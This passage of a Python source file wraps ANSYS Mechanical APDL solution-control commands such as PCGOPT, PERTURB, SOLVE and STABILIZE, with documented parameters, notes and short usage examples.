OPENUPFACTOR - Factor for increasing the time step interval. Specify when AUTOTS,ON is issued
and specify a VALUE > 1.0 (up to 10.0). The default
VALUE = 1.5 (except for thermal analysis, where it
is 3.0). Generally, VALUE > 3.0 is not recommended.
value, numstep
Two values used in the algorithm for determining if the time step
interval can be increased. Valid only when Lab = DOF.
Notes
-----
This command is available only for nonlinear or full transient
analysis.
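Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
raise the time step opening factor to 2.0:
>>> mapdl.opncontrol("OPENUPFACTOR", 2.0)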
"""
command = f"OPNCONTROL,{lab},{value},{numstep}"
return self.run(command, **kwargs)
def outaero(self, sename="", timeb="", dtime="", **kwargs):
"""Outputs the superelement matrices and load vectors to formatted files
APDL Command: OUTAERO
for aeroelastic analysis.
Parameters
----------
sename
Name of the superelement that models the wind turbine supporting
structure. Defaults to the current Jobname.
timeb
First time at which the load vector is formed (defaults to be read
from SENAME.sub).
dtime
Time step size of the load vectors (defaults to be read from
SENAME.sub).
Notes
-----
Both TIMEB and DTIME must be blank if the time data is to be read from
the SENAME.sub file.
The matrix file (SENAME.SUB) must be available from the substructure
generation run before issuing this command. This superelement that
models the wind turbine supporting structure must contain only one
master node with six freedoms per node: UX, UY, UZ, ROTX, ROTY, ROTZ.
The master node represents the connection point between the turbine and
the supporting structure.
This command will generate four files that are exported to the
aeroelastic code for integrated wind turbine analysis. The four files
are Jobname.GNK for the generalized stiffness matrix, Jobname.GNC for
the generalized damping matrix, Jobname.GNM for the generalized mass
matrix and Jobname.GNF for the generalized load vectors.
For detailed information on how to perform a wind coupling analysis,
see Coupling to External Aeroelastic Analysis of Wind Turbines in the
Mechanical APDL Advanced Analysis Guide.
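Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
the superelement name below is illustrative only:
>>> mapdl.outaero("TOWER")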
"""
command = f"OUTAERO,{sename},{timeb},{dtime}"
return self.run(command, **kwargs)
def ovcheck(self, method="", frequency="", set_="", **kwargs):
"""Checks for overconstraint among constraint equations and Lagrange
APDL Command: OVCHECK
multipliers.
Parameters
----------
method
Method used to determine which slave DOFs will be eliminated:
TOPO - Topological approach (default). This method only works with constraint
equations; it does not work with Lagrange multipliers.
ALGE - Algebraic approach.
NONE - Do not use overconstraint detection logic.
frequency
Frequency of overconstraint detection for static or full transient
analyses:
ITERATION - For all equilibrium iterations (default).
SUBSTEP - At the beginning of each substep.
LOADSTEP - At the beginning of each load step.
set\_
Set of equations:
ALL - Check for overconstraint between all constraint equations (default).
LAG - Check for overconstraint only on the set of equations that involves Lagrange
multipliers. This is faster than checking all sets,
especially when the model contains large MPC bonded contact
pairs.
Notes
-----
The OVCHECK command checks for overconstraint among the constraint
equations (CE/CP) and the Lagrange multipliers for the globally
assembled stiffness matrix. If overconstrained constraint equations or
Lagrange multipliers are detected, they are automatically removed from
the system of equations.
The constraint equations that are identified as redundant are removed
from the system and printed to the output file. It is very important
that you check the removed equations—they may lead to convergence
issues, especially for nonlinear analyses.
The Frequency and Set arguments are active only for the topological
method (Method = TOPO). If you do not issue the OVCHECK command,
overconstraint detection is performed topologically, and the slave DOFs
are also determined topologically.
Overconstraint detection slows down the run. We recommend using it to
validate that your model does not contain any overconstraints. Then,
you can switch back to the default method (no OVCHECK command is
needed).
As an example, consider the redundant set of constraint equations
defined below:
Equation number 2 will be removed by the overconstraint detection
logic. However, this is an arbitrary decision since equation number 1
could be removed instead. This is an important choice as the constant
term is not the same in these two constraint equations. Therefore, you
must check the removed constraint equations carefully.
For detailed information on the topological and algebraic methods of
overconstraint detection, see Constraints: Automatic Selection of Slave
DOFs in the Mechanical APDL Theory Reference.
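Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
check for overconstraint topologically at the start of each substep:
>>> mapdl.ovcheck("TOPO", "SUBSTEP", "ALL")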
"""
command = f"OVCHECK,{method},{frequency},{set_}"
return self.run(command, **kwargs)
def pcgopt(
self,
lev_diff="",
reduceio="",
strmck="",
wrtfull="",
memory="",
lm_key="",
**kwargs,
):
"""Controls PCG solver options.
APDL Command: PCGOPT
Parameters
----------
lev_diff
Indicates the level of difficulty of the analysis. Valid
settings are AUTO or 0 (default), 1, 2, 3, 4, or 5. This
option applies to both the PCG solver when used in static
and full transient analyses and to the PCG Lanczos method
in modal analyses. Use AUTO to let ANSYS automatically
choose the proper level of difficulty for the model. Lower
values (1 or 2) generally provide the best performance for
well-conditioned problems. Values of 3 or 4 generally
provide the best performance for ill-conditioned problems;
however, higher values may increase the solution time for
well-conditioned problems. Higher level-of-difficulty
values typically require more memory. Using the highest
value of 5 essentially performs a factorization of the
global matrix (similar to the sparse solver) and may
require a very large amount of memory. If necessary, use
Memory to reduce the memory usage when using Lev_Diff = 5.
Lev_Diff = 5 is generally recommended for small- to
medium-sized problems when using the PCG Lanczos mode
extraction method.
reduceio
Controls whether the PCG solver will attempt to reduce I/O
performed during equation solution:
AUTO - Automatically chooses whether to reduce I/O or not
(default).
YES - Reduces I/O performed during equation solution in
order to reduce total solver time.
NO - Does NOT reduce I/O performed during equation solution.
strmck
Controls whether or not a Sturm sequence check is performed:
OFF - Does NOT perform Sturm sequence check (default).
ON - Performs Sturm sequence check
wrtfull
Controls whether or not the .FULL file is written.
ON - Write .FULL file (default)
OFF - Do not write .FULL file.
memory
Controls whether to run using in-core or out-of-core mode
when using Lev_Diff = 5.
AUTO - Automatically chooses which mode to use (default).
INCORE - Run using in-core mode.
OOC - Run using out-of-core mode.
lm_key
Controls use of the PCG solver for MPC184 Lagrange
multiplier method elements. This option applies only to
the PCG solver when used in static and full transient
analyses.
OFF - Do not use the PCG solver for the MPC184 Lagrange
multiplier method (default).
ON - Allow use of the PCG solver for the MPC184 Lagrange
multiplier method.
Notes
-----
ReduceIO works independently of the MSAVE command in the PCG
solver. Setting ReduceIO to YES can significantly increase
the memory usage in the PCG solver.
To minimize the memory used by the PCG solver with respect to
the Lev_Diff option only, set Lev_Diff = 1 if you do not have
sufficient memory to run the PCG solver with Lev_Diff = AUTO.
The MSAVE,ON command is not valid when using Lev_Diff = 5. In
this case, the Lev_Diff value will automatically be reset to
2. The MSAVE,ON command is also not valid with the StrmCk
option. In this case, StrmCk will be set to OFF.
Distributed ANSYS Restriction: The Memory option and the
LM_Key option are not supported in Distributed ANSYS.
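Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
raise the level of difficulty and reduce I/O:
>>> mapdl.pcgopt(lev_diff=3, reduceio="YES")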
"""
command = f"PCGOPT,{lev_diff},,{reduceio},{strmck},{wrtfull},{memory},{lm_key}"
return self.run(command, **kwargs)
def perturb(self, type_="", matkey="", contkey="", loadcontrol="", **kwargs):
"""Sets linear perturbation analysis options.
APDL Command: PERTURB
Parameters
----------
type\_
Type of linear perturbation analysis to be performed:
STATIC - Perform a linear perturbation static analysis.
MODAL - Perform a linear perturbation modal analysis.
BUCKLE - Perform a linear perturbation eigenvalue buckling analysis.
HARMONIC - Perform a linear perturbation full harmonic analysis.
SUBSTR - Perform a linear perturbation substructure generation pass.
OFF - Do not perform a linear perturbation analysis (default).
matkey
Key for specifying how the linear perturbation analysis uses
material properties, valid for all structural elements except
contact elements. For more information, see Linear Perturbation
Analysis in the Mechanical APDL Theory Reference.
AUTO - The program selects the material properties for the linear
perturbation analysis automatically (default). The materials
are handled in the following way:
- For pure linear elastic materials used in the base analysis, the
same properties are used in the linear perturbation analysis.
- For hyperelastic materials used in the base analysis, the material
properties are assumed to be linear elastic in the linear
perturbation analysis. The material property data (or material
Jacobian) is obtained based on the tangent of the hyperelastic
material's constitutive law at the point where restart occurs.
- For any nonlinear materials other than hyperelastic materials used
in the base analysis, the material properties are assumed to be
linear elastic in the linear perturbation analysis. The material
data is the same as the linear portion of the nonlinear materials
(that is, the parts defined by MP commands).
- For COMBIN39, the stiffness is that of the first segment of the
force-deflection curve.
TANGENT - Use the tangent (material Jacobian) on the material
constitutive curve as the material property. The material
property remains linear in the linear perturbation analysis
and is obtained at the point of the base analysis where
restart occurs. The materials are handled in the following
way:
- For pure linear elastic materials used in the base analysis, the
same properties are used in the linear perturbation analysis.
Because the material constitutive curve is linear, the tangent is
the same as the base analysis.
- For hyperelastic materials used in the base analysis, the program
uses the same tangent as that used for MatKey = AUTO, and the
results are therefore identical.
- For any nonlinear materials other than hyperelastic materials used
in the base analysis, the material properties are obtained via the
material tangent on the material constitutive curve at the restart
point of the base analysis.
- The materials and properties typically differ from MatKey = AUTO,
but it is possible the results could be identical or very similar
if a) the material is elasto-plastic rate-independent and is
unloading (or has neutral loading) at the restart point, or b) the
material is rate-dependent, depending on the material properties
and loading conditions.
- For COMBIN39, the stiffness is equal to the tangent of the current
segment of the force-deflection curve.
- In a modal restart solution that follows a linear perturbation
modal analysis, the TANGENT option is overridden by the AUTO
option and linear material properties are used for stress
calculations in the modal restart. See the discussion in the Notes
for more information.
contkey
Key that controls contact status for the linear perturbation
analysis. This key controls all contact elements (TARGE169,
TARGE170, and CONTA171 through CONTA178) globally for all contact
pairs. Alternatively, contact status can be controlled locally per
contact pair by using the CNKMOD command. Note that the contact
status from the base analysis solution is always adjusted by the
local contact controls specified by CNKMOD first and then modified
by the global sticking or bonded control (ContKey = STICKING or
BONDED). The tables in the Notes section show how the contact
status is adjusted by CNKMOD and/or the ContKey setting.
CURRENT - Use the current contact status from the restart
snapshot (default). If the previous run is
nonlinear, then the nonlinear contact status at
the point of restart is frozen and used
throughout the linear perturbation analysis.
STICKING - For frictional contact pairs (MU > 0), use
sticking contact (e.g., ``MU*KN`` for tangential
contact stiffness) everywhere the contact state
is closed (i.e., status is sticking or
sliding). This option only applies to contact
pairs that are in contact and have a frictional
coefficient MU greater than zero. Contact pairs
without friction (MU = 0) and in a sliding
state remain free to slide in the linear
perturbation analysis.
BONDED - Any contact pairs that are in the closed
(sticking or sliding) state are moved to bonded
(for example, KN for both normal and tangential
contact stiffness). Contact pairs that have a
status of far-field or near-field remain open.
loadcontrol
Key that controls how the load vector of {Fperturbed} is
calculated. This control is provided for convenience of load
generation for linear perturbation analysis. In general, a new set
of loads is required for a linear perturbation analysis. This key
controls all mechanical loads; it does not affect non-mechanical
loads. Non-mechanical loads (including thermal loads) are always
kept (i.e., not deleted).
ALLKEEP - Keep all the boundary conditions (loads and
constraints) from the end of the load step of
the current restart point. This option is
convenient for further load application and is
useful for a linear perturbation analysis
restarted from a previous linear analysis. For
this option, {Fend} is the total load vector at
the end of the load step at the restart point.
INERKEEP - Delete all loads and constraints from the
restart step, except for displacement
constraints and inertia loads (default). All
displacement constraints and inertia loads are
kept for convenience when performing the linear
perturbation analysis. Note that nonzero and
tabular displacement constraints can be
considered as external loads; however, they are
not deleted when using this option.
PARKEEP - Delete all loads and constraints from the
restart step, except for displacement
constraints. All displacement constraints are
kept for convenience when performing the linear
perturbation analysis. Note that nonzero and
tabular displacement constraints can be
considered as external loads; however, they are
not deleted when using this option.
DZEROKEEP - Behaves the same as the PARKEEP option, except
that all nonzero displacement constraints are
set to zero upon the onset of linear
perturbation.
NOKEEP - Delete all the loads and constraints, including
all displacement constraints. For this option,
{Fend} is zero unless non-mechanical loads (e.g.,
thermal loads) are present.
Notes
-----
This command controls options relating to linear perturbation analyses.
It must be issued in the first phase of a linear perturbation analysis.
This command is also valid in PREP7.
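Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
set up a linear perturbation modal analysis with default material and
contact handling:
>>> mapdl.perturb("MODAL", "AUTO", "CURRENT", "INERKEEP")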
"""
command = f"PERTURB,{type_},{matkey},{contkey},{loadcontrol}"
return self.run(command, **kwargs)
def prscontrol(self, key="", **kwargs):
"""Specifies whether to include pressure load stiffness in the element
APDL Command: PRSCONTROL
stiffness formation.
Parameters
----------
key
Pressure load stiffness key. In general, use the default setting.
Use a non-default setting only if you encounter convergence
difficulties. Pressure load stiffness is automatically included
when using eigenvalue buckling analyses (ANTYPE,BUCKLE), equivalent
to Key = INCP. For all other types of analyses, valid arguments for
Key are:
NOPL - Pressure load stiffness not included for any elements.
(blank) (default) - Include pressure load stiffness for elements SURF153, SURF154, SURF156,
SURF159, SHELL181, PLANE182, PLANE183, SOLID185,
SOLID186, SOLID187, SOLSH190, BEAM188, BEAM189,
FOLLW201, SHELL208, SHELL209, SOLID272, SOLID273,
SHELL281, SOLID285, PIPE288, PIPE289, and
ELBOW290. Do not include pressure load stiffness
for elements SOLID65.
INCP - Pressure load stiffness included for all of the default elements listed above
and SOLID65.
Notes
-----
This command is rarely needed. The default settings are recommended for
most analyses.
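Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
exclude pressure load stiffness for all elements:
>>> mapdl.prscontrol("NOPL")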
"""
command = f"PRSCONTROL,{key}"
return self.run(command, **kwargs)
def pscontrol(self, option="", key="", **kwargs):
"""Enables or disables shared-memory parallel operations.
APDL Command: PSCONTROL
Parameters
----------
option
Specify the operations for which you intend to enable/disable
parallel behavior:
ALL - Enable/disable parallel for all areas (default).
PREP - Enable/disable parallel during preprocessing (/PREP7).
SOLU - Enable/disable parallel during solution (/SOLU).
FORM - Enable/disable parallel during element matrix generation.
SOLV - Enable/disable parallel during equation solver.
RESU - Enable/disable parallel during element results calculation.
POST - Enable/disable parallel during postprocessing (/POST1 and /POST26).
STAT - List parallel operations that are enabled/disabled.
key
Option control key. Used for all Option values except STAT.
ON - Enable parallel operation.
OFF - Disable parallel operation.
Notes
-----
Use this command in shared-memory parallel operations.
This command is useful when you encounter minor discrepancies in a
nonlinear solution when using different numbers of processors. A
parallel operation applied to the element matrix generation can produce
a different nonlinear solution with a different number of processors.
Although the nonlinear solution converges to the same nonlinear
tolerance, the minor discrepancy created may not be desirable for
consistency.
Enabling/disabling parallel behavior for the solution (Option = SOLU)
supersedes the activation/deactivation of parallel behavior for element
matrix generation (FORM), equation solver (SOLV), and element results
calculation (RESU).
The SOLV option supports only the sparse direct and PCG solvers
(EQSLV,SPARSE or PCG). No other solvers are supported.
This command applies only to shared-memory architecture. It does not
apply to the Distributed ANSYS product.
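Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
disable parallel element matrix generation only:
>>> mapdl.pscontrol("FORM", "OFF")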
"""
command = f"PSCONTROL,{option},{key}"
return self.run(command, **kwargs)
def rate(self, option="", **kwargs):
"""Specifies whether the effect of creep strain rate will be used in the
APDL Command: RATE
solution of a load step.
Parameters
----------
option
Activates implicit creep analysis.
0 or OFF - No implicit creep analysis. This option is the default.
1 or ON - Perform implicit creep analysis.
Notes
-----
Set Option = 1 (or ON) to perform an implicit creep analysis (TB,CREEP
with TBOPT ≥ 1). For viscoplasticity/creep analysis, Option specifies
whether or not to include the creep calculation in the solution of a
load step. If Option = 1 (or ON), ANSYS performs the creep calculation.
Set an appropriate time for solving the load step via a TIME,TIME
command.
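Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
activate implicit creep for the current load step:
>>> mapdl.rate("ON")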
"""
command = f"RATE,{option}"
return self.run(command, **kwargs)
def resvec(self, key="", **kwargs):
"""Calculates or includes residual vectors.
APDL Command: RESVEC
Parameters
----------
key
Residual vector key:
OFF - Do not calculate or include residual vectors. This option is the default.
ON - Calculate or include residual vectors.
Notes
-----
In a modal analysis, the RESVEC command calculates residual vectors. In
a mode-superposition transient dynamic, mode-superposition harmonic,
PSD or spectrum analysis, the command includes residual vectors.
In a component mode synthesis (CMS) generation pass, the RESVEC command
calculates one residual vector which is included in the normal modes
basis used in the transformation matrix. It is supported for the three
available CMS methods. RESVEC,ON can only be specified in the first
load step of a generation pass and is ignored if issued at another load
step.
If rigid-body modes exist, pseudo-constraints are required for the
calculation. Issue the D,,,SUPPORT command to specify only the minimum
number of pseudo-constraints necessary to prevent rigid-body motion.
For more information about residual vector formulation, see Residual
Vector Method in the Mechanical APDL Theory Reference.
"""
command = f"RESVEC,{key}"
return self.run(command, **kwargs)
def rstoff(self, lab="", offset="", **kwargs):
"""Offsets node or element IDs in the FE geometry record.
APDL Command: RSTOFF
Parameters
----------
lab
The offset type:
NODE - Offset the node IDs.
ELEM - Offset the element IDs.
offset
A positive integer value specifying the offset value to apply. The
value must be greater than the number of nodes or elements in the
existing superelement results file.
Notes
-----
The RSTOFF command offsets node or element IDs in the FE geometry
record saved in the .rst results file. Use the command when expanding
superelements in a bottom-up substructuring analysis (where each
superelement is generated individually in a generation pass, and all
superelements are assembled together in the use pass).
With appropriate offsets, you can write results files with unique node
or element IDs and thus display the entire model even if the original
superelements have overlapping element or node ID sets. (Such results
files are incompatible with the .db database file saved at the
generation pass.)
The offset that you specify is based on the original superelement node
or element numbering, rather than on any offset specified via a SESYMM
or SETRAN command. When issuing an RSTOFF command, avoid specifying an
offset that creates conflicting node or element numbers for a
superelement generated via a SESYMM or SETRAN command.
If you issue the command to set non-zero offsets for node or element
IDs, you must bring the geometry into the database via the SET command
so that ANSYS can display the results. You must specify appropriate
offsets to avoid overlapping node or element IDs with other
superelement results files.
The command is valid only in the first load step of a superelement
expansion pass.
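Examples
--------
A minimal usage sketch, assuming ``mapdl`` is an active MAPDL session;
the offset value below is illustrative only:
>>> mapdl.rstoff("NODE", 100000)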
"""
command = f"RSTOFF,{lab},{offset}"
return self.run(command, **kwargs)
def scopt(self, tempdepkey="", **kwargs):
"""Specifies System Coupling options.
APDL Command: SCOPT
Parameters
----------
tempdepkey
Temperature-dependent behavior key based on the convection
coefficient:
* ``"YES"`` : A negative convection coefficient, -N, is
assumed to be a function of temperature and is determined
from the HF property table for material N (MP command). This
is the default.
* ``"NO"`` : A negative convection coefficient, -N, is used as
is in the convection calculation.
Notes
-----
By default in the Mechanical APDL program, a negative convection
coefficient value triggers temperature-dependent behavior. In
System Coupling, and in some one-way CFD to Mechanical APDL
thermal simulations, it is desirable to allow convection
coefficients to be used as negative values. To do so, issue the
command ``scopt("NO")``.
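Examples
--------
Sketch assuming an active ``mapdl`` session:
>>> mapdl.scopt("NO")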
"""
return self.run(f"SCOPT,{tempdepkey}", **kwargs)
def seexp(self, sename="", usefil="", imagky="", expopt="", **kwargs):
"""Specifies options for the substructure expansion pass.
APDL Command: SEEXP
Parameters
----------
sename
The name (case-sensitive) of the superelement matrix file created
by the substructure generation pass (Sename.SUB). Defaults to the
initial jobname File. If a number, it is the element number of the
superelement as used in the use pass.
usefil
The name of the file containing the superelement degree-of-freedom
(DOF) solution created by the substructure use pass (Usefil.DSUB).
imagky
Key to specify use of the imaginary component of the DOF solution.
Applicable only if the use pass is a harmonic (ANTYPE,HARMIC)
analysis:
OFF - Use real component of DOF solution (default).
ON - Use imaginary component of DOF solution.
expopt
Key to specify whether the superelement (ANTYPE,SUBSTR) expansion
pass (EXPASS,ON) should transform the geometry:
OFF - Do not transform node or element locations (default).
ON - Transform node or element locations in the FE geometry record of the .rst
results file.
Notes
-----
Specifies options for the expansion pass of the substructure analysis
(ANTYPE,SUBSTR). If used in SOLUTION, this command is valid only
within the first load step.
If you specify geometry transformation (Expopt = ON), you must retrieve
the transformation matrix (if it exists) from the specified .SUB file.
The command updates the nodal X, Y, and Z coordinates to represent the
transformed node locations. The Expopt option is useful when you want
to expand superelements created from other superelements (via SETRAN or
SESYMM commands). For more information, see Superelement Expansion in
Transformed Locations and Plotting or Printing Mode Shapes.
This command is also valid in /PREP7.
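Examples
--------
Hypothetical file names, for illustration only (assumes an active
``mapdl`` session with ``GEN.SUB`` and ``USE.DSUB`` available):
>>> mapdl.seexp("GEN", "USE", "OFF", "ON")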
"""
command = f"SEEXP,{sename},{usefil},{imagky},{expopt}"
return self.run(command, **kwargs)
def seopt(
self, sename="", sematr="", sepr="", sesst="", expmth="", seoclvl="", **kwargs
):
"""Specifies substructure analysis options.
APDL Command: SEOPT
Parameters
----------
sename
The name (case-sensitive, thirty-two character maximum) assigned to
the superelement matrix file. The matrix file will be named
Sename.SUB. This field defaults to Fname on the /FILNAME command.
sematr
Matrix generation key:
1 - Generate stiffness (or conductivity) matrix (default).
2 - Generate stiffness and mass (or conductivity and specific heat) matrices.
3 - Generate stiffness, mass and damping matrices.
sepr
Print key:
0 - Do not print superelement matrices or load vectors.
1 - Print both load vectors and superelement matrices.
2 - Print load vectors but not matrices.
sesst
Stress stiffening key:
0 - Do not save space for stress stiffening in a later run.
1 - Save space for the stress stiffening matrix (calculated in a subsequent
generation run after the expansion pass).
expmth
Expansion method for expansion pass:
BACKSUB - Save necessary factorized matrix files for backsubstitution during subsequent
expansion passes (default). This normally results in
heavy disk space usage.
RESOLVE - Do not save factorized matrix files. Global stiffness matrix will be reformed
during expansion pass. This option provides an effective
way to save disk space usage. This option cannot be used
if the use pass uses large deflections (NLGEOM,ON).
seoclvl
For the added-mass calculation, the ocean level to use when ocean
waves (OCTYPE,,WAVE) are present:
ATP - The ocean level at this point in time (default).
MSL - The mean ocean level.
Notes
-----
The SEOPT command specifies substructure analysis options
(ANTYPE,SUBSTR). If used during solution, the command is valid only
within the first load step.
When ocean waves (OCTYPE,,WAVE) are present, the SeOcLvL argument
specifies the ocean height or level to use for the added-mass
calculation, as the use-run analysis type is unknown during the
generation run.
The expansion pass method RESOLVE is not supported with component mode
synthesis analysis (CMSOPT). ExpMth is automatically set to BACKSUB for
CMS analysis. The RESOLVE method invalidates the use of the NUMEXP
command. The RESOLVE method does not allow the computation of results
based on nodal velocity and nodal acceleration (damping force, inertial
force, kinetic energy, etc.) in the substructure expansion pass.
This command is also valid in PREP7.
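Examples
--------
Generate stiffness and mass matrices for a superelement matrix file
named ``GEN.SUB`` (hypothetical name; assumes an active ``mapdl``
session):
>>> mapdl.seopt("GEN", 2)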
"""
command = f"SEOPT,{sename},{sematr},{sepr},{sesst},{expmth},{seoclvl}"
return self.run(command, **kwargs)
def snoption(
self,
rangefact="",
blocksize="",
robustlev="",
compute="",
solve_info="",
**kwargs,
):
"""Specifies Supernode (SNODE) eigensolver options.
APDL Command: SNOPTION
Parameters
----------
rangefact
Factor used to control the range of eigenvalues computed for each
supernode. The value of RangeFact must be a number between 1.0 and
5.0. By default the RangeFact value is set to 2.0, which means that
all eigenvalues between 0 and ``2*FREQE`` are computed for each
supernode (where FREQE is the upper end of the frequency range of
interest as specified on the MODOPT command). As the RangeFact
value increases, the eigensolution for the SNODE solver becomes
more accurate and the computational time increases.
blocksize
BlockSize to be used when computing the final eigenvectors. The
value of Blocksize must be either MAX or a number between 1 and
NMODE, where NMODE is the number of modes to be computed as set on
the MODOPT command. Input a value of MAX to force the algorithm to
allocate enough memory to hold all of the final eigenvectors in
memory and, therefore, only read through the file containing the
supernode eigenvectors once. Note that this setting is ONLY
recommended when there is sufficient physical memory on the machine
to safely hold all of the final eigenvectors in memory.
robustlev
Parameter used to control the robustness of the SNODE eigensolver.
The value of RobustLev must be a number between 0 and 10. Lower
values of RobustLev allow the eigensolver to run in the most
efficient manner for optimal performance. Higher values of
RobustLev often slow down the performance of the eigensolver, but
can increase the robustness; this may be desirable if a problem is
detected with the eigensolver or its eigensolution.
compute
Key to control which computations are performed by the Supernode
eigensolver:
EVALUE - The eigensolver computes only the eigenvalues.
EVECTOR - The eigensolver computes only the eigenvectors
(must be preceded by a modal analysis where the
eigenvalues were computed using the Supernode
eigensolver).
BOTH - The eigensolver computes both the eigenvalues and
eigenvectors in the same pass (default).
solve_info
Solver output option:
OFF - Turns off additional output printing from the
Supernode eigensolver (default).
PERFORMANCE - Turns on additional output printing from the
Supernode eigensolver, including a
performance summary and a summary of file
I/O for the Supernode
eigensolver. Information on memory usage
during assembly of the global matrices (that
is, creation of the Jobname.FULL file) is
also printed with this option.
Notes
-----
This command specifies options for the Supernode (SNODE)
eigensolver.
Setting RangeFact to a value greater than 2.0 will improve the
accuracy of the computed eigenvalues and eigenvectors, but
will often increase the computing time of the SNODE
eigensolver. Conversely, setting RangeFact to a value less
than 2.0 will deteriorate the accuracy of the computed
eigenvalues and eigenvectors, but will often speedup the
computing time of the SNODE eigensolver. The default value of
2.0 has been set as a good blend of accuracy and performance.
The SNODE eigensolver reads the eigenvectors and related
information for each supernode from a file and uses that
information to compute the final eigenvectors. For each
eigenvalue/eigenvector requested by the user, the program must
do one pass through the entire file that contains the
supernode eigenvectors. By choosing a BlockSize value greater
than 1, the program can compute BlockSize number of final
eigenvectors for each pass through the file. Therefore,
smaller values of BlockSize result in more I/O, and larger
values of BlockSize result in less I/O. Larger values of
BlockSize also result in significant additional memory usage,
as BlockSize number of final eigenvectors must be stored in
memory. The default Blocksize of min(NMODE,40) is normally a
good choice to balance memory and I/O usage.
The RobustLev field should only be used when a problem is
detected with the accuracy of the final solution or if the
Supernode eigensolver fails while computing the
eigenvalues/eigenvectors. Setting RobustLev to a value greater
than 0 will cause the performance of the eigensolver to
deteriorate. If the performance deteriorates too much or if
the eigensolver continues to fail when setting the RobustLev
field to higher values, then switching to another eigensolver
such as Block Lanczos or PCG Lanczos is recommended.
Setting Compute = EVALUE causes the Supernode eigensolver to
compute only the requested eigenvalues. During this process a
Jobname.SNODE file is written; however, a Jobname.MODE file is
not written. Thus, errors will likely occur in any downstream
computations that require the Jobname.MODE file (for example,
participation factor computations, mode superposition
transient/harmonic analysis, PSD analysis). Setting Compute =
EVECTOR causes the Supernode eigensolver to compute only the
corresponding eigenvectors. The Jobname.SNODE file and the
associated Jobname.FULL file are required when requesting
these eigenvectors. In other words, the eigenvalues must have
already been computed for this model before computing the
eigenvectors. This field can be useful in order to separate
the two steps (computing eigenvalues and computing
eigenvectors).
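Examples
--------
Illustrative settings only (assumes an active ``mapdl`` session):
>>> mapdl.snoption(rangefact=3.0, blocksize=8)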
"""
command = (
f"SNOPTION,{rangefact},{blocksize},{robustlev},{compute},,{solve_info}"
)
return self.run(command, **kwargs)
def solve(self, action="", **kwargs):
"""Starts a solution.
APDL Command: SOLVE
Parameters
----------
action
Action to be performed on solve (used only for linear perturbation
analyses).
ELFORM - Reform all appropriate element matrices in the first phase of a linear
perturbation analysis.
Notes
-----
Starts the solution of one load step of a solution sequence based on
the current analysis type and option settings. Use Action = ELFORM only
in the first phase of a linear perturbation analysis.
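Examples
--------
Assuming an active ``mapdl`` session with loads and analysis options
already defined:
>>> mapdl.solve()
>>> mapdl.finish()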
"""
command = f"SOLVE,{action}"
return self.run(command, **kwargs)
def stabilize(
self, key="", method="", value="", substpopt="", forcelimit="", **kwargs
):
"""Activates stabilization for all elements that support nonlinear
APDL Command: STABILIZE
stabilization.
Parameters
----------
key
Key for controlling nonlinear stabilization:
OFF - Deactivate stabilization. This value is the default.
CONSTANT - Activate stabilization. The energy-dissipation ratio or damping factor remains
constant during the load step.
REDUCE - Activate stabilization. The energy-dissipation ratio or damping factor is
reduced linearly to zero at the end of the load step from
the specified or calculated value.
method
The stabilization-control method:
ENERGY - Use the energy-dissipation ratio as the control. This value is the default
when Key ≠ OFF.
DAMPING - Use the damping factor as the control.
value
The energy-dissipation ratio (Method = ENERGY) or damping factor
(Method = DAMPING). This value must be greater than 0 when Method =
ENERGY or Method = DAMPING. When Method = ENERGY, this value is
usually a number between 0 and 1.
substpopt
Option for the first substep of the load step:
NO - Stabilization is not activated for the first substep even when it does not
converge after the minimal allowed time increment is reached.
This value is the default when Key ≠ OFF.
MINTIME - Stabilization is activated for the first substep if it still does not converge
after the minimal allowed time increment is reached.
ANYTIME - Stabilization is activated for the first substep. Use this option if
stabilization was active for the previous load step via
Key = CONSTANT.
forcelimit
The stabilization force limit coefficient, such that 0 < FORCELIMIT
< 1. The default value is 0.2. To omit a stabilization force check,
set this value to 0.
Notes
-----
Once issued, a STABILIZE command remains in effect until you reissue
the command.
For the energy dissipation ratio, specify VALUE = 1.0e-4 if you have no
prior experience with the current model; if convergence problems are
still an issue, increase the value gradually. The damping factor is
mesh-, material-, and time-step-dependent; an initial reference value
from the previous run (such as a run with the energy-dissipation ratio
as input) should suggest itself.
Exercise caution when specifying SubStpOpt = MINTIME or ANYTIME for the
first load step; ANSYS, Inc. recommends this option only for
experienced users. If stabilization was active for the previous load
step via Key = CONSTANT and convergence is an issue for the first
substep, specify SubStpOpt = ANYTIME.
When the L2-norm of the stabilization force (CSRSS value) exceeds the
L2-norm of the internal force multiplied by the stabilization force
coefficient, ANSYS issues a message displaying both the stabilization
force norm and the internal force norm. The FORCELIMIT argument allows
you to change the default stabilization force coefficient (normally 20
percent).
This command stabilizes the degrees of freedom for current-technology
elements only. Other elements can be included in the FE model, but
their degrees of freedom are not stabilized.
For more information about nonlinear stabilization, see Unstable
Structures in the Structural Analysis Guide. For additional tips that
can help you to achieve a stable final model, see Simplify Your Model
in the Structural Analysis Guide.
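Examples
--------
Constant energy-dissipation stabilization using the starting ratio
suggested in the notes above (assumes an active ``mapdl`` session):
>>> mapdl.stabilize("CONSTANT", "ENERGY", 1e-4)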
"""
command = f"STABILIZE,{key},{method},{value},{substpopt},{forcelimit}"
return self.run(command, **kwargs)
def thexpand(self, key="", **kwargs):
"""Enables or disables thermal loading
APDL Command: THEXPAND
Parameters
----------
key
Activation key:
ON - Thermal loading is included in the load vector (default).
OFF - Thermal loading is not included in the load vector.
Notes
-----
Temperatures applied in the analysis are used by default to evaluate
material properties and contribute to the load vector if the
temperature does not equal the reference temperature and a coefficient
of thermal expansion is specified.
Use THEXPAND,OFF to evaluate the material properties but not contribute
to the load vector. This capability is particularly useful when
performing a harmonic analysis where you do not want to include
harmonically varying thermal loads. It is also useful in a modal
analysis when computing a modal load vector but excluding the thermal
load.
This command is valid for all analysis types except linear perturbation
modal and linear perturbation harmonic analyses. For these two linear
perturbation analysis types, the program internally sets THEXPAND,OFF,
and it cannot be set to ON by using this command (THEXPAND,ON is
ignored).
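Examples
--------
Exclude thermal loading from the load vector (assumes an active
``mapdl`` session):
>>> mapdl.thexpand("OFF")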
"""
command = f"THEXPAND,{key}"
return self.run(command, **kwargs)
